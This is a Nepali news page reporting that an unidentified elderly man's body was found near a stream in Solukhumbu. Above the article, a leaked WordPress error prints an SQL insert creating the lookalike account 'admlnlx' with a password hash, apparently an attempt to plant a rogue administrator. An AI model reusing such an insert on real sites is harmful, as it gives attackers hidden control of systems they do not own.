WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BIoB99WJh0eEw7nndkEbYMZiLGukWB0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 07:42:42', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुको माप्यमा एक बृद्धको शव बेवारिसे अवस्थामा फेला – Gaule Khabar

सोलुखुम्बुको माप्यमा एक बृद्धको शव बेवारिसे अवस्थामा फेला

सोलुखुम्बुको माप्यमा एक बृद्धको शव बेवारिसे अवस्थामा फेला

सोलुखुम्बु । सोलुखुम्बु जिल्लाको माप्य दुधकोशी गाउँपालिका वडा नम्बर ४ काकुमा बेवारिसे शब फेला परेको छ । बिहिबार एक बृद्धाको शव बेवारिसे अवस्थामा लवखा खोला नजिकै फेला परेको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ ।

नामथर ठेगाना नखुलेको करिब ६५ वर्षीय बृद्धको शव वेवारिसे अवस्थामा फेला परेको प्रहरीले जनाएको छ । बिहान स्थानीयले शव देखेपछि प्रहरीलाई खबर गरेका थिए । घटनास्थलबाट प्रहरी परिचालन भइसकेको प्रहरीे जनाएको छ । घटनाको बिषयमा बिस्तुत विवरण आउन बाँकी छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका